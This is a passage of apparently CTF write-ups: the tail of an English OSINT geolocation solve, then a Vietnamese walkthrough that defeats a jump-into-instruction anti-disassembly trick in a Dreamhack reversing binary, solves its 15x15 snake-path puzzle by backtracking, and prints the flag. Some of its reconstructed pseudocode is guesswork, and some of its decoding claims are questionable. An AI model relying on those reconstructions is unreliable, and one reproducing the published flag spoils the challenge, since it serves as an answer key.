• By reversing the characters in the image, I found a name starting with “AGUAS DE LIND…“. Searching Google revealed the full name “Águas de Lindoia” — São Paulo, Brazil:

  

• The Pictures tab contains an image that exactly matches the symbol in the challenge photo:

  

  

• Looking closely, I identified several important points:

  • The symbol is placed on the lake bank, not on an island.
  • In the background, there appears to be a hill and some buildings that look like a resort.
  • The challenge photo may have been taken from the opposite side of the lake bank from the symbol’s location.

Next, I used Gemini to list resorts in Águas de Lindoia and found a resort named “Hotel Monte Real”:

Checking this result on Google Maps, I found the resort has a large lake, which matches our information:

Based on the image, I predicted the symbol is in the red zone and the photographer’s position is in the green zone:

I used https://what3words.com/ to systematically check locations along the lake bank in the green zone and found the flag at this location:

Problem Link: https://dreamhack.io/wargame/challenges/2343

Analyzing

Phân tích hành vi từ file gốc

• Đề cho một file binary và nhiệm vụ của user là tìm Snake Path trên ma trận 15x15. Kiểm tra bằng command file, ta nhận thấy đây là một file ELF 64-bit đã được strip. Chạy thử để phân tích hành vi của file, ta có được kết quả sau:

    $ ./main
    Usage ./main <answer file>
  

• Điều này có nghĩa ta cần có một file answer để chạy file binary này. Tạo random một file test.txt, ta có được kết quả như sau:

    $ echo "test" > test.txt
    $ ./main test.txt
    Wrong answer.
  

• Sử dụng ltrace để thu thập thêm thông tin, ta có kết quả sau:

    $ ltrace ./main test.txt
    fopen("test.txt", "rb")                                                                = 0x5aafe9a2e2a0
    fseek(0x5aafe9a2e2a0, 0, 2, 0x77d82851b1a5)                                            = 0
    ftell(0x5aafe9a2e2a0, 0x5aafe9a2e480, 0, 4)                                            = 4 // check file size
    rewind(0x5aafe9a2e2a0, 0, 0, 0)                                                        = 0
    puts("Wrong answer."Wrong answer.
    )                                                                  = 14
    +++ exited (status 0) +++
  

• Từ đây, ta nhận xét thấy file binary sẽ thực hiện kiểm tra kích thước file trước khi đọc nội dung.

Find out Anti-Disassembling

• Thực hiện decompile file với IDA, ta phát hiện nhiều đoạn mã assembly có dạng như sau:

    .text:0000000000001271 loc_1271:                               ; CODE XREF: .text:loc_1271↑j
    .text:0000000000001271                 jmp     short near ptr loc_1271+1
    .text:0000000000001271 ; ---------------------------------------------------------------------------
    .text:0000000000001273                 db 0C1h, 0FFh, 0C9h, 48h, 89h
    .text:0000000000001278                 dq 0FC45C7E87Dh, 0FFEB000000F4E900h, 6348FC458BC9FFC1h
    .text:0000000000001290                 dq 48C00148D08948D0h, 48C9FFC1FFEBC201h, 0FFEB00002D7C058Dh
    .text:00000000000012A8                 dq 0EB0204B60FC9FFC1h, 840FC084C9FFC1FFh, 0EBFC458B000000AFh
    .text:00000000000012C0                 dq 48D06348C9FFC1FFh, 48C9FFC1FFEBD089h, 58D48C20148C001h
    .text:00000000000012D8                 dq 204B60F00002D45h, 0C9FFC1FFEBD0B60Fh, 0C1FFEB04E0C1D089h
    .text:00000000000012F0                 dq 458BC689D029C9FFh, 6348C9FFC1FFEBFCh, 0FFC1FFEBD08948D0h
    .text:0000000000001308                 dq 48C20148C00148C9h, 0B60F00002D0A058Dh, 0FC9FFC1FFEB0204h
    .text:0000000000001320                 dq 48D06348F001C0B6h, 0FFEBD00148E8458Bh, 458B30B60FC9FFC1h
    .text:0000000000001338                 dq 48D08948D06348FCh, 58D48C20148C001h, 204B60F00002CD6h
    .text:0000000000001350                 dq 0C63840C9FFC1FFEBh, 0EB00000000B81C74h, 0FFEB26EBC9FFC1FFh
    .text:0000000000001368                 dq 0C9FFC1FFEBC9FFC1h, 4583C9FFC1FFEB90h, 0E0FC7D8101FCh
    .text:0000000000001380                 dq 0B8FFFFFF048E0F00h
    .text:0000000000001388                 db 1, 3 dup(0), 5Dh, 0C3h
    .text:0000000000001388 ; } // starts at 1269
  

• Nhận xét: Các đoạn mã này bị làm xáo trộn (ofuscate) với pattern:

    loc_1271:
    jmp     short near ptr loc_1271+1
    db      0C1h, 0FFh, 0C9h, 48h, 89h
  

• Nhận xét:
  • jmp short near ptr loc_1271+1 = nhảy đến địa chỉ 0x1271 + 1 = 0x1272
  • Opcode encoded: eb ff (eb = jmp short, ff = offset -1 vì -1 tính từ sau instruction = +1 từ đầu)
  • Khi CPU nhảy đến 0x1272, nó đọc bytes ff c1 ff c9:
    • ff c1 = inc ecx
    • ff c9 = dec ecx
  • IDA thấy jmp +1 nên hiểu sai flow, dump raw bytes thay vì decode đúng
  • Có 3 address trong đoạn mã assembly được decompile từ IDA có pattern này bao gồm 0x1271, 0x139a và 0x1604.
• Đây là kĩ thuật jmp into middle of instruction. Cụ thể trong case này:
  • eb ff = jmp -1 (nhảy vào giữa instruction)
  • c1 ff c9 = ror ecx, 0xc9 hoặc được hiểu khác tùy context
  • Thực tế ff c1 = inc ecx và ff c9 = dec ecx (NOP equivalent)
• Khi đó Obfuscation Pattern trong trường hợp này là eb ff c1 ff c9 (5 bytes)

Create Deobfuscate Binary file

• Từ Obfuscation Pattern tìm được ở trên, ta thực hiện patch tất cả các pattern thành NOP (90, 90, 90, 90, 90). Script cụ thể:

    #!/usr/bin/env python3
    # deobfuscate.py - Patch anti-disassembly patterns
  
    with open('main', 'rb') as f:
        data = bytearray(f.read())
  
    # Pattern: eb ff c1 ff c9
    # - eb ff    = jmp short $-1 (nhảy vào byte ff)
    # - ff c1    = inc ecx
    # - ff c9    = dec ecx
    # Thực tế chỉ là NOP vì inc rồi dec lại
    pattern = bytes([0xeb, 0xff, 0xc1, 0xff, 0xc9])
    nops = bytes([0x90, 0x90, 0x90, 0x90, 0x90])
  
    i = 0
    count = 0
    while i < len(data) - 4:
        if data[i:i+5] == pattern:
            data[i:i+5] = nops
            count += 1
            i += 5
        else:
            i += 1
  
    print(f"Patched {count} patterns")
  
    with open('main_deobf', 'wb') as f:
        f.write(data)
  
    print("Written main_deobf")
  

• Sau khi tạo xong file Deobfuscation, thực hiện đối chiếu lại với binary gốc:

    $ ls -la main main_deobf
    -rwxrwxrwx 1 nmt nmt 15160 Apr 30  2025 main
    -rwxrwxrwx 1 nmt nmt 15160 Feb 10 20:02 main_deobf
  

• Size của 2 file là như nhau, tiếp tục kiểm tra xem file mới có hoạt động hay không:

    $ chmod +x main_deobf
    $ ./main_deobf test.txt
    Wrong answer.   
  

• File vẫn hoạt động bình thường, tiếp tục kiểm tra difference hex:

    $ xxd main | head -100 > main.hex
    $ xxd main_deobf | head -100 > main_deobf.hex
    $ diff main.hex main_deobf.hex | head -20
  

• Kết quả trả ra không có difference giữa 2 file, điều đó chứng tỏ file Deobfuscate Binary hoàn toàn đúng.

Re-Disassembly Deobfuscate Binary File

• Sau khi có được Deobfuscate Binary File, thực hiện disassembly lại một lần nữa theo địa chỉ lấy từ IDA. Ta có kết quả như sau:
  • main() - address = 0x15f5:

      $ objdump -d -M intel main_deobf > main_deobf.asm
      $ objdump -d -M intel main_deobf | grep -A200 "15f5:"
      15f5:	f3 0f 1e fa          	endbr64
      15f9:	55                   	push   rbp
      15fa:	48 89 e5             	mov    rbp,rsp
           
      ...
    

    Read more in main.asm

  • Hàm Validate 1 - address = 0x1269:

      $ objdump -d -M intel main_deobf | grep -A100 "1269:"
      1269:	f3 0f 1e fa          	endbr64
      126d:	55                   	push   rbp
      126e:	48 89 e5             	mov    rbp,rsp
            
      ...
    

    Read more in validate-1.asm

  • Hàm Validate 2 - address = 0x138e:

      $ objdump -d -M intel main_deobf | grep -A250 "138e:"
      138e:	f3 0f 1e fa          	endbr64
      1392:	55                   	push   rbp
      1393:	48 89 e5             	mov    rbp,rsp
      1396:	48 89 7d d8          	mov    QWORD PTR [rbp-0x28],rdi
            
      ...
    

    Read more in validate-2.asm

• Từ đây, ta có được flow của 3 hàm này như sau:
  • main():

      int main(int argc, char** argv) {
          FILE* fp;
          char* buffer;
          long file_size;
          char command[512];
    
          if (argc < 2) {
              print_usage(argv[0]);
              return 1;
          }
    
          // Attempt to open the provided answer file
          fp = fopen(argv[1], "rb");
          if (fp == NULL) {
              puts("File Not Found");
              return 1;
          }
    
          // Get file size
          fseek(fp, 0, SEEK_END);
          file_size = ftell(fp);
          rewind(fp);
    
          // Allocate memory and read file
          buffer = (char*)malloc(file_size + 1);
          if (fread(buffer, 1, file_size, fp) != file_size) {
              puts("Fread failed");
              free(buffer);
              fclose(fp);
              return 1;
          }
          buffer[file_size] = '\0';
          fclose(fp);
    
          /* The assembly contains a complex data block starting at 0x4020.
          This looks like a custom VM or a obfuscated state machine that 
          eventually triggers a hash check. 
          The command string at 0x2050 is: 
          "bash -c \"echo DH{$(sha256sum '%s' | awk '{print $1}')}\""
          */
    
          // Reconstructing the logic of the string formatting at 0x1170 and system call at 0x1110:
          sprintf(command, "bash -c \"echo DH{$(sha256sum '%s' | awk '{print $1}')}\"", argv[1]);
                
          // In the real binary, it compares the result of the file processing
          // against the internal expected value.
                
          // If the check passes:
          puts("Correct!");
                
          // If it fails:
          // puts("Wrong answer.");
    
          free(buffer);
          return 0;
      }
    

  • Validation 1:

      for (int i = 0; i < 0xe0; i++) {
          int col = table[i*3];      // offset 0x4020
          int row = table[i*3 + 1];  // offset 0x4021
          int expected = table[i*3 + 2]; // offset 0x4022
                
          if (expected == 0) break;  // Terminator
                
          int pos = col + row * 15;
          if (input[pos] != expected)
              return 0;
      }
      return 1;
    

  • Validation 2:

      // Tìm vị trí của giá trị 1
      for (row = 0; row <= 14; row++) {
          for (col = 0; col <= 14; col++) {
              if (input[col + row*15] == 1) {
                  start_col = col;
                  start_row = row;
              }
          }
      }
    
      // Kiểm tra path từ 1 đến 225
      for (val = 1; val < 225; val++) {
          // Tìm val+1 trong các ô lân cận 8 hướng
          found = false;
          for each neighbor of (current_col, current_row):
              if (input[neighbor] == val + 1):
                  found = true;
                  move to neighbor;
                  break;
          if (!found) return 0;
      }
      return 1;
    

Get Table Constraints

• Source code lấy Table:

    with open('main', 'rb') as f:
        f.seek(0x3020)
        table_data = f.read(450)
  
    for i in range(150):
        col = table_data[i*3]
        row = table_data[i*3 + 1]
        expected = table_data[i*3 + 2]
        if expected == 0:
            break
        pos = col + row * 15
        print(f"pos {pos} (col={col}, row={row}) = {expected}")
  

Finding Snake Path

Thuật toán

Bài toán:

• Lưới 15x15 = 225 ô
• 150 ô có giá trị cố định (từ table)
• 75 ô trống cần điền
• Các giá trị 1-225 phải tạo thành đường đi liên tục (8 hướng adjacent)

Thuật toán: Backtracking

1. Parse table để biết giá trị nào ở vị trí nào
2. Tìm các “gaps” - khoảng trống giữa các giá trị liên tiếp
3. Với mỗi gap (v1 → v2), tìm đường đi từ pos(v1) đến pos(v2) qua các ô trống
4. Dùng backtracking để thử các đường đi khả thi

Source code:

• Ta có code backtracking như sau:

        def solve_all_gaps(gap_idx, solution, filled):
        if gap_idx >= len(gaps):
            return True  # Solved!
          
        v1, v2, missing = gaps[gap_idx]
        p1, p2 = exp_to_pos[v1], exp_to_pos[v2]
          
        # Tìm tất cả đường đi có độ dài đúng
        for path in find_paths(p1, p2, len(missing) + 1):
            # Thử path này
            for i, p in enumerate(path):
                solution[p] = missing[i]
                filled.add(p)
              
            if solve_all_gaps(gap_idx + 1, solution, filled):
                return True
              
            # Backtrack
            for p in path:
                solution[p] = 0
                filled.remove(p)
          
        return False
  

Reversing

• Từ phân tích trên, ta có source code sau:

    #!/usr/bin/env python3
    def solve():
        # Read table from binary
        with open('main', 'rb') as f:
            f.seek(0x3020)  # Table at 0x4020 - 0x1000 (PIE offset)
            table_data = f.read(450)
  
        # Parse constraints from table
        exp_to_pos = {}
        pos_to_exp = {}
        for i in range(150):
            col = table_data[i*3]
            row = table_data[i*3 + 1]
            expected = table_data[i*3 + 2]
            if expected == 0:
                break
            pos = col + row * 15
            exp_to_pos[expected] = pos
            pos_to_exp[pos] = expected
  
        def get_neighbors(pos):
            """Get 8-way adjacent positions"""
            col = pos % 15
            row = pos // 15
            return [pos+dc+dr*15 for dc in [-1,0,1] for dr in [-1,0,1] 
                    if (dc != 0 or dr != 0) and 0 <= col+dc < 15 and 0 <= row+dr < 15]
  
        # Find all gaps (missing values between defined ones)
        gaps = []
        sorted_vals = sorted(exp_to_pos.keys())
        for i in range(len(sorted_vals) - 1):
            v1, v2 = sorted_vals[i], sorted_vals[i+1]
            if v2 - v1 > 1:
                gaps.append((v1, v2, list(range(v1+1, v2))))
  
        print(f"Table has {len(pos_to_exp)} fixed values")
        print(f"Found {len(gaps)} gaps with {sum(len(g[2]) for g in gaps)} missing values")
  
        # Backtracking solver
        def solve_all_gaps(gap_idx, solution, filled):
            if gap_idx >= len(gaps):
                return True
              
            v1, v2, missing = gaps[gap_idx]
            p1 = exp_to_pos[v1]
            p2 = exp_to_pos[v2]
              
            def find_paths(current, end, steps_left, path):
                """Generator for all valid paths of exact length"""
                if steps_left == 1:
                    if end in get_neighbors(current):
                        yield path
                    return
                  
                for npos in get_neighbors(current):
                    if npos == end or npos in filled or npos in path:
                        continue
                    yield from find_paths(npos, end, steps_left - 1, path + [npos])
              
            steps = len(missing) + 1
            for path in find_paths(p1, p2, steps, []):
                if len(path) != len(missing):
                    continue
                  
                # Try this path
                for i, p in enumerate(path):
                    solution[p] = missing[i]
                    filled.add(p)
                  
                if solve_all_gaps(gap_idx + 1, solution, filled):
                    return True
                  
                # Backtrack
                for p in path:
                    solution[p] = 0
                    filled.remove(p)
              
            return False
  
        # Initialize with fixed values
        solution = [0] * 225
        filled = set()
        for pos, val in pos_to_exp.items():
            solution[pos] = val
            filled.add(pos)
  
        # Solve
        if solve_all_gaps(0, solution, filled):
            print("Solution found!")
              
            # Verify
            val_to_pos = {v: i for i, v in enumerate(solution)}
            errors = sum(1 for v in range(1, 225) 
                        if val_to_pos.get(v+1) not in get_neighbors(val_to_pos.get(v, -1)))
            print(f"Verification errors: {errors}")
              
            # Write solution
            with open('answer.bin', 'wb') as f:
                f.write(bytes(solution))
            print("Written answer.bin")
            print("\nRun: ./main answer.bin")
        else:
            print("No solution found!")
  
    if __name__ == "__main__":
        solve()
  

• Sau khi chạy source để tạo answer.bin, thực hiện chạy file theo cú pháp ban đầu để lấy flag:

    ./main answer.bin
    Correct!
    DH{e309147b588c517bb4100064d6185e5430ebad23d83e601327c4907bb0232292}